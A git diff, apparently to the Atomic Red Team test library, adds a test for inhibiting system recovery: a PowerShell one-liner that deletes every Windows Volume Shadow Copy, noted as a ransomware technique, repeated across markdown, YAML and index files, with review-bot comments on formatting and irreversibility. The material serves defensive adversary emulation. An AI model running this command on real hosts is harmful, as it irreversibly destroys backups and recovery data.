diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md
index 0ca55270..4c9bfc81 100644
--- a/atomics/T1490/T1490.md
+++ b/atomics/T1490/T1490.md
@@ -19,6 +19,8 @@ A number of native Windows utilities have been used by adversaries to disable or
- [Atomic Test #4 - Windows - Disable Windows Recovery Console Repair](#atomic-test-4---windows---disable-windows-recovery-console-repair)
+- [Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell](#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell)
+
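Review bot: the hunk adds an empty `+` line right after the new Test #5 link in the table of contents; the existing entries (Test #4 and above) are not separated by blank lines, so drop it to keep the list contiguous when the markdown renders.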
@@ -101,4 +103,26 @@ bcdedit.exe /set {default} recoveryenabled no
+
+
+
+## Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell
+Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
+This technique is used by numerous ransomware families such as Sodinokibi/REvil.
+Executes Get-WMIObject
+
+**Supported Platforms:** Windows
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+```
+powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"
+```
+
+
+
+
+
+
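Review bot: the description ends in the fragment "Executes Get-WMIObject", which repeats the first sentence and is cut off; either finish the thought or remove the line. The description also spells the cmdlet `Get-WMIObject` while the command uses `Get-WmiObject`; pick one spelling. Because deleting shadow copies is irreversible and this section has no cleanup step, the description should say plainly that the test is destructive so it is only run on disposable hosts. The six trailing `+` blank lines after the code fence should also be trimmed to match the spacing used by the earlier tests in this file.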
diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml
index 3a12008f..0e3bc6f8 100644
--- a/atomics/T1490/T1490.yaml
+++ b/atomics/T1490/T1490.yaml
@@ -58,3 +58,18 @@ atomic_tests:
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
+- name: Windows - Delete Volume Shadow Copies via WMI with PowerShell
+ description: |
+ Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
+ This technique is used by numerous ransomware families such as Sodinokibi/REvil.
+ Executes Get-WMIObject
+
+ supported_platforms:
+ - windows
+
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: |
+ powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"
+
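Review bot: the `description: |` block ends with the dangling line "Executes Get-WMIObject" plus trailing whitespace, which is what produces the `Executes Get-WMIObject \n` string in the regenerated index.yaml; complete or drop that line, and use the same cmdlet spelling as the command (`Get-WmiObject`). There is no `cleanup_command` in the executor, and none can restore shadow copies once deleted, so state in the description that the action is destructive and irreversible. Consider using the `powershell` executor directly, e.g. `name: powershell` with `command: Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }`, rather than wrapping `powershell.exe -Command` inside `command_prompt`; the two-level quoting is what makes the command harder to read and maintain.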
diff --git a/atomics/index.md b/atomics/index.md
index 5c349fdd..c3007815 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -516,6 +516,7 @@
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
+ - Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](./T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index de3626f5..de3c10af 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -16115,6 +16115,19 @@ impact:
command: |
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
+ - name: Windows - Delete Volume Shadow Copies via WMI with PowerShell
+ description: "Deletes Windows Volume Shadow Copies with PowerShell code and
+ Get-WMIObject. \nThis technique is used by numerous ransomware families such
+ as Sodinokibi/REvil.\nExecutes Get-WMIObject \n"
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: 'powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object
+ {$_.Delete();}"
+
+'
T1496:
technique:
x_mitre_data_sources:
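Review bot: the generated entry carries the trailing space in `Executes Get-WMIObject \n` and a quoted command value that ends in two extra newlines (`{$_.Delete();}"` followed by an empty line before the closing `'`), both inherited from the whitespace in T1490.yaml; fix the source YAML and regenerate this index rather than editing it by hand.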
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index f9a2c827..8434b0cc 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -378,6 +378,7 @@
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
+ - Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](./T1496/T1496.md)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)